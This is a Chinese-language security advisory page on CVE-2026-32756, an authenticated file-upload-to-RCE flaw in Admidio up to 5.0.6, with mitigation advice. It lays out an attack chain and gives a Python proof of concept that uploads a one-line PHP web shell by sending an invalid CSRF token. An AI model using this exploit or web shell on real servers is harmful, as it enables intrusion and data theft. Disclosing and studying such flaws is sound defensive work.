IPBUF安全漏洞报告
English
CVE-2026-32756 CVSS 8.8 高危

CVE-2026-32756 Admidio任意文件上传致RCE漏洞

披露日期: 2026-03-20
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-32756
漏洞类型
远程代码执行
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Admidio

相关标签

RCEFile UploadAdmidioBypassCSRF

漏洞概述

Admidio是一款开源在线成员管理系统,其5.0.6及以下版本存在严重的任意文件上传漏洞。该漏洞源于Documents & Files模块中CSRF验证与文件扩展检查的逻辑设计缺陷。拥有上传权限的攻击者可通过提交无效CSRF令牌绕过安全限制,上传恶意PHP脚本,最终导致服务器远程代码执行,造成完全的系统沦陷和数据泄露风险。

技术细节

该漏洞核心在于Admidio的Documents & Files模块中UploadHandlerFile.php的验证逻辑缺陷。系统在设计上同时依赖CSRF令牌验证和文件扩展名白名单来确保上传安全。然而,当处理上传请求时,如果CSRF令牌无效,代码逻辑可能导致后续的文件扩展名验证流程被绕过或未正确执行。具体而言,攻击者首先需要是拥有上传权限的认证用户,随后构造一个包含恶意PHP代码的文件上传请求,并在请求中故意篡改或缺失CSRF令牌。服务器接收到请求后,因CSRF校验失败而未执行严格的扩展名检查,直接将恶意文件保存至服务器。攻击者随后通过特定的URL访问该PHP文件,迫使Web服务器解析并执行其中的恶意代码,从而在服务器端执行任意系统命令,完全控制服务器。

攻击链分析

STEP 1
1. 信息收集
识别目标Admidio系统版本,确认版本在5.0.6及以下。
STEP 2
2. 获取凭证
注册或获取一个具有文件上传权限的合法用户账号。
STEP 3
3. 漏洞利用
构造上传请求,包含恶意PHP脚本,并故意提交无效的CSRF令牌,绕过文件扩展名限制。
STEP 4
4. 代码执行
访问已上传的恶意PHP文件路径,触发Web服务器解析,执行系统命令。
STEP 5
5. 后渗透
建立后门,窃取数据库数据或进行横向移动。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Configuration target_url = "http://example.com/admidio/adm_program/modules/documents-files/upload_handler_file.php" attacker_cookie = {"PHPSESSID": "<authenticated_session_id>"} # Requires valid login # Malicious PHP payload php_payload = "<?php system($_GET['cmd']); ?>" # Exploit Logic: Submit file with an invalid/missing CSRF token to bypass extension check files = { 'userfile': ('exploit.php', php_payload, 'application/x-php') } # Sending an invalid CSRF token triggers the bypass logic data = { 'csrf_token': 'INVALID_TOKEN_12345' } response = requests.post(target_url, files=files, data=data, cookies=attacker_cookie) if response.status_code == 200 and "success" in response.text.lower(): print("[+] Exploit successful! File uploaded.") print("[+] Access your shell at: /adm_my_files/exploit.php?cmd=whoami") else: print("[-] Exploit failed.") print(response.text)

影响范围

Admidio <= 5.0.6

防御指南

临时缓解措施
建议立即升级至Admidio 5.0.7或更高版本以修补此漏洞。如果暂时无法升级,应在服务器配置中禁用上传目录(如adm_my_files)的PHP脚本执行权限,或者严格限制普通用户的文件上传功能。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表